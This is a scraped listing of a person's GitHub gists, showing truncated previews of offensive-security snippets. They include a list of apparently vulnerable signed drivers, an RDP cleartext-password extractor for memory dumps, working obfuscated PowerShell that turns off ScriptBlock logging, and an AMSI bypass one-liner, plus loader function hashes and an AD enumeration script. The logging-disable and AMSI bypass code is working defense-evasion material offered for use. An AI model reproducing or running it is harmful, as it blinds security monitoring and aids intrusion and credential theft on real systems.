We can make this file beautiful and searchable if this error is corrected: It looks like row 9 should actually have 4 columns, instead of 2 in line 8.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SHA256,Name,Signer,Description | |
| 04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162,ADV64DRV.sys,"""FUJITSU LIMITED """, | |
| 05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748,Agent64.sys,"""eSupport.com, Inc.""",DriverAgent Direct I/O for 64-bit Windows | |
| 4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows | |
| 6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows | |
| 8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F,Agent64.sys,"""eSupport.com, Inc""",DriverAgent Direct I/O for 64-bit Windows | |
| B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414,Agent64.sys,"""eSupport.com, Inc.""",DriverAgent Direct I/O for 64-bit Windows | |
| 7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D,ALSysIO64.sys,Artur Liberman,ALSysIO | |
| 7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA,ALSys |
k4nfr3
/ RDP_clear.py
Last active
May 20, 2021 07:59
Quick python script to analyse mem dump and extract RDP clear passwords while waiting for Mimikatz to integrate it as a module
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re | |
| from collections import namedtuple | |
| import sys | |
| # Clear text password recovery from mem dump as found by @jonasLyk Tweet : https://twitter.com/jonasLyk/status/1393058962942083076 | |
| # borrowed python code from Willi Ballenthin -> https://gist.github.com/williballenthin/8e3913358a7996eab9b96bd57fc59df2 | |
| # code inspired by @gentilkiwi 's video | |
| # This is for those who like me wanted to play with this discovery a little and dirty python3 script while waiting to see another module in the great mimikatz tool | |
| # I'm no dev so PR and constructive remarks are welcome |
k4nfr3
/ Disable-ScriptBlockLogBypass.ps1
Created
August 27, 2021 09:16
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
| If ($GroupPolicyField) { | |
| $GroupPolicyCache = $GroupPolicyField.GetValue($null) | |
| If ($GroupPolicyCache['ScriptB'+'lockLogging']) { | |
| $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 | |
| $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 | |
| } | |
| $val = [System.Collections.Generic.Dictionary[string,System.Object]]::new() | |
| $val.Add('EnableScriptB'+'lockLogging', 0) | |
| $val.Add('EnableScriptB'+'lockInvocationLogging', 0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Write-Host '[+] Loading AMSI Bypass...' | |
| S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x')) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')+'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} ) | |
| Write-Host '[+] done' -ForegroundColor green |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Scrapped from official web site: https://downloads.rclone.org/v.../SHA1SUMS | |
| =========================================================================== | |
| Windows Clients | |
| ecce335a75b0f8678ba0494b178f3b41309b72be rclone-current-windows-386.zip | |
| 0d9e1fd984d0ab5312060024ab6498046562c134 rclone-current-windows-amd64.zip | |
| ecce335a75b0f8678ba0494b178f3b41309b72be rclone-v1.40-windows-386.zip | |
| 0d9e1fd984d0ab5312060024ab6498046562c134 rclone-v1.40-windows-amd64.zip | |
| 18d6a87012de120c66b5abaa97f5932fe56beee7 rclone-v1.41-windows-386.zip | |
| 6f4bee89380b70742ba7d37c80da0f0b4f890612 rclone-v1.41-windows-amd64.zip |
k4nfr3
/ IORI_Loader 0x99 hash of functions
Last active
October 28, 2022 15:15
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'ntdll.dll' '4097367' '0x3e8557' | |
| 'RegNtCallbackObjectContextCleanup' '1094975913383384674' '0xf3222cab2d35662' | |
| 'RegNtPostCreateKey' '76320549262' '0x11c50f298e' | |
| 'RegNtPostCreateKeyEx' '686884943685' '0x9fed887745' | |
| 'RegNtPostDeleteKey' '76320533467' '0x11c50eebdb' | |
| 'RegNtPostDeleteValueKey' '18545889663766' '0x10de0d2a5b16' | |
| 'RegNtPostEnumerateKey' '2060655325624' '0x1dfc8a0f1b8' | |
| 'RegNtPostEnumerateValueKey' '500739244157917' '0x1c76b70c5ebdd' | |
| 'RegNtPostFlushKey' '25440190120' '0x5ec5a7ea8' | |
| 'RegNtPostKeyHandleClose' '18545901133010' '0x10de0dd95cd2' |
k4nfr3
/ DOH client test
Created
January 10, 2023 12:28
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import json | |
| import re | |
| import socket | |
| import ssl | |
| import subprocess | |
| import sys |
k4nfr3
/ list_machines.py
Created
May 17, 2023 07:36
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # modifications of original script GetAdusers.py from Impacket. | |
| # this version returns the list of last seen 24h machines | |
| #python list_machines.py TIMATEC.local/fbu -dc-ip 192.168.16.11 | |
| #Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation | |
| # | |
| #Password: | |
| #[*] Querying 192.168.16.11 for information about domain. | |
| #Name PasswordLastSet LastLogon OperatingSystemVersion OperatingSystem IP Address | |
| #-------------------- -------------------------- -------------------------- ---------------------- --------------------------------------- ------------ |
k4nfr3
/ velocity.py
Last active
June 30, 2023 15:02
velocity.ch daily script to repurchase my free parking as I'm using it daily
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| # Proxy settings fo debug (with burp or other) | |
| proxy_enable = False | |
| proxy = { | |
| 'http': 'http://127.0.0.1:8080', | |
| 'https': 'http://127.0.0.1:8080' | |
| } |
k4nfr3
/ Kiteworks_DPAPI_session.cfg_decryptor
Created
March 1, 2024 17:25
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Add NugetComponent Microsoft.Win32.Registry | |
| Add NugetComponent System.Security.Cryptography.ProtectedData | |
| Program.cs based on https://github.com/sergeig888/csharp-dpapi-PBIE/ | |
| Tested on lates version Kiteworks 8.3.0 | |
| ========================================= | |
| /* Created by Sergei Gundorov 1/2/2020 | |
| * Intent: provide sample project for encrypting secrets with DPAPI while working with | |
| * Power BI Embedded and API tutorials and samples. |
OlderNewer